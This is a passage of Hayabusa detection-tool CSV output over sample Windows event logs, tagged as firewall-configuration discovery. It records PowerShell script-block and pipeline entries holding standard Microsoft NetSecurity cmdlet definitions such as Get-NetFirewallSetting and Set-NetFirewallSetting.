($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByAssociatedNetIPsecMainModeSA', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeSA.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:06.129 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log," 1.0.0.0 NetFirewallSetting 
",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:06.145 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Get-Command): ""Get-Command"" ParameterBinding(Get-Command): name=""Module""; value=""Microsoft.PowerShell.Core"" ParameterBinding(Get-Command): name=""Name""; value=""Set-StrictMode""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:06.145 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:06.145 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""TypeName""; value=""System.Collections.Generic.Dictionary[string,string]""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:06.145 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): 
""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:06.145 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetFirewallSetting""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:06.145 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 if ($(Microsoft.PowerShell.Core\Get-Command Set-StrictMode -Module Microsoft.PowerShell.Core)) { Microsoft.PowerShell.Core\Set-StrictMode -Off } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetSecuritySettingData' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = 'Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter' $script:PrivateData = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.Dictionary[string,string]' Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { 
$__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetFirewallSetting { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetSecuritySettingData')] param( [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder 
= $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallSetting.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetFirewallSetting' function Set-NetFirewallSetting { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetSecuritySettingData')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetSecuritySettingData')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.TrafficExemption] ${Exemptions}, [Parameter(ParameterSetName='Query 
(cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${EnableStatefulFtp}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${EnableStatefulPptp}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteMachineTransportAuthorizationList}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteMachineTunnelAuthorizationList}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteUserTransportAuthorizationList}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteUserTunnelAuthorizationList}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${RequireFullAuthSupport}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.CRLCheck] ${CertValidationLevel}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecThroughNAT] ${AllowIPsecThroughNAT}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${MaxSAIdleTimeSeconds}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyEncoding] ${KeyEncoding}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] 
[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PacketQueuing] ${EnablePacketQueuing}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains 
$PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Exemptions')) { [object]$__cmdletization_value = ${Exemptions} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Exemptions'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.TrafficExemption'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Exemptions'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.TrafficExemption'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EnableStatefulFtp')) { [object]$__cmd",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:06.145 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,letization_value = ${EnableStatefulFtp} $__cmdletization_methodParameter = 
Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'EnableStatefulFtp'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'EnableStatefulFtp'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EnableStatefulPptp')) { [object]$__cmdletization_value = ${EnableStatefulPptp} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'EnableStatefulPptp'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'EnableStatefulPptp'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteMachineTransportAuthorizationList')) { [object]$__cmdletization_value = 
${RemoteMachineTransportAuthorizationList} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteMachineTransportAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteMachineTransportAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteMachineTunnelAuthorizationList')) { [object]$__cmdletization_value = ${RemoteMachineTunnelAuthorizationList} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteMachineTunnelAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteMachineTunnelAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteUserTransportAuthorizationList')) { [object]$__cmdletization_value = ${RemoteUserTransportAuthorizationList} $__cmdletization_methodParameter = 
Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteUserTransportAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteUserTransportAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteUserTunnelAuthorizationList')) { [object]$__cmdletization_value = ${RemoteUserTunnelAuthorizationList} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteUserTunnelAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteUserTunnelAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RequireFullAuthSupport')) { [object]$__cmdletization_value = ${RequireFullAuthSupport} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 
'RequireFullAuthSupport'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RequireFullAuthSupport'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('CertValidationLevel')) { [object]$__cmdletization_value = ${CertValidationLevel} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'CertValidationLevel'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.CRLCheck'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'CertValidationLevel'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.CRLCheck'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowIPsecThroughNAT')) { [object]$__cmdletization_value = ${AllowIPsecThroughNAT} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object 
Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowIPsecThroughNAT'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecThroughNAT'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowIPsecThroughNAT'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecThroughNAT'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxSAIdleTimeSeconds')) { [object]$__cmdletization_value = ${MaxSAIdleTimeSeconds} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxSAIdleTimeSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxSAIdleTimeSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('KeyEncoding')) { [object]$__cmdletization_value = ${KeyEncoding} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'KeyEncoding'; ParameterType = 
'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyEncoding'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'KeyEncoding'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyEncoding'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EnablePacketQueuing')) { [object]$__cmdletization_value = ${EnablePacketQueuing} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'EnablePacketQueuing'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PacketQueuing'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'EnablePacketQueuing'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PacketQueuing'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdleti,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:06.145 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"zation_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) 
$__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallSetting.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallSetting'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:06.145 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { 
$__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:06.145 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Get-NetFirewallSetting { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetSecuritySettingData')] param( [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, 